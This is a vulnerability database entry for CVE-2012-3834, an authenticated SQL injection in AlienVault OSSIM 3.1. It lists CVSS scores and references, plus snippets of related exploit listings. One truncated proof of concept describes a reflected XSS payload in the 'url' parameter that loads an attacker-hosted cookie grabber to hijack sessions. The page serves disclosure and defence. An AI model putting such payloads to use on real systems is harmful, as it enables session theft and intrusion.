Published: 03/07/2012 Updated: 29/08/2017

CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8

VMScore: 660

Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Subscribe to Open Source Security Information Management

SQL injection vulnerability in forensics/base_qry_main.php in AlienVault Open Source Security Information Management (OSSIM) 3.1 allows remote authenticated users to execute arbitrary SQL commands via the time[0][0] parameter.

Vulnerable Product	Search on Vulmon	Subscribe to Product
alienvault open source security information management 3.1

##################################################################################### # Advisory: Alienvault OSSIM Open Source SIEM 31 Multiple security vulnerabilities # Advisory ID: SSCHADV-EDB-2012-001 # Contact: sschurtz@darksecurityde # Author: Stefan Schurtz # Affected Software: Successfully tested on Alienvault Open Source SIEM 31 (32bit) ...

#!/usr/bin/python ''' AlienVault has a reflected XSS vulnerability in the "url" parameter of "topphp" Proof of Concept: Enticing a logged in user to visit the following URL where an attacker is hosting an cookie grabber will allow for the hijacking of the user session: victim/ossim/topphp?option=3&soption=3&url=<script sr ...

CWE-89 http://www.darksecurity.de/index.php?/211-KORAMIS-ADV2012-002-Alienvault-OSSIM-Open-Source-SIEM-3.1-Multiple-security-vulnerabilities.html http://www.securityfocus.com/bid/53331 http://secunia.com/advisories/49005 http://www.exploit-db.com/exploits/18800 http://www.koramis.com/advisories/2012/KORAMIS-ADV2012-002.txt https://exchange.xforce.ibmcloud.com/vulnerabilities/75290 https://nvd.nist.gov https://www.exploit-db.com/exploits/18800/

CVE-2012-3834

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect